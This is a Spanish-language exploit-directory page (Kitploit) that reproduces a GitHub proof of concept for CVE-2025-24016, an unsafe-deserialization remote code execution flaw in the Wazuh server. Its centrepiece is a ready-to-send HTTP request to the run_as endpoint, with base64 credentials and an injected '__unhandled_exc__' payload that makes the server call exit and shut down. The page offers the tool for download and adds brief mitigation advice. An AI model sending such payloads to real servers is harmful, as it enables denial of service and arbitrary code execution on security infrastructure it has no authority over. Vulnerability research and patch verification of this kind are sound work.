Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24016 — CVE-2025-24016: RCE en servidor Wazuh! Ejecución remota de código | Kitploit
Herramientas/GitHubGitHub/glostarrx1/cve-2025-24016
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubglostarrx1/cve-2025-24016

CVE-2025-24016

CVE-2025-24016: RCE en servidor Wazuh! Ejecución remota de código

Ver Repositorio
16hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

Ejecución Remota de Código (RCE) en Wazuh - PoC

Resumen de la Vulnerabilidad

Este repositorio demuestra la vulnerabilidad de ejecución remota de código (RCE) en el servidor Wazuh, introducida por una deserialización insegura en el paquete wazuh-manager. La vulnerabilidad permite que atacantes remotos con acceso a la API (dashboard comprometido, servidores Wazuh en el clúster, o ciertas configuraciones con agentes comprometidos) ejecuten código arbitrario en el servidor.

Versiones Afectadas

  • wazuh-manager versión >= 4.4.0
  • Parcheado en la versión >= 4.9.1

Descripción

La vulnerabilidad ocurre en la API de Wazuh, donde los parámetros en DistributedAPI se serializan como JSON y se deserializan usando as_wazuh_object en el archivo framework/wazuh/core/cluster/common.py. Un atacante puede explotar esta vulnerabilidad inyectando un diccionario no saneado en las solicitudes DAPI, lo que puede llevar a la evaluación de código Python arbitrario.

La RCE puede ser desencadenada usando el endpoint run_as, que permite al atacante controlar el argumento auth_context. Al elaborar una solicitud maliciosa, se puede ejecutar código arbitrario en el servidor maestro.

Prueba de Concepto

Para desencadenar esta vulnerabilidad usando la API del servidor, siga los pasos a continuación.

Solicitud PoC en Burp Suite

  1. Solicitud de Burp Suite para desencadenar la vulnerabilidad:
root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

Imagen de solución

  1. Explicación de la solicitud:
  • Encabezado de Autorización: Esta es la autorización codificada en base64 (wazuh-wui:MyS3cr37P450r.*-).
  • Payload: El payload malicioso contiene la excepción no saneada __unhandled_exc__ que desencadena la ejecución de código Python arbitrario (exit en este caso).

Impacto

  • Ejecución Remota de Código (RCE): Esta vulnerabilidad permite a los atacantes ejecutar código arbitrario en el servidor Wazuh, afectando versiones >= 4.4.0 hasta 4.9.0 (aún no parcheadas).
  • Posible Denegación de Servicio: En esta PoC, se desencadena la función exit, causando que el servidor Wazuh se apague.

Mitigación

Para proteger sus sistemas, actualice a la versión >= 4.9.1 de Wazuh, donde este problema está parcheado.

Descargar herramienta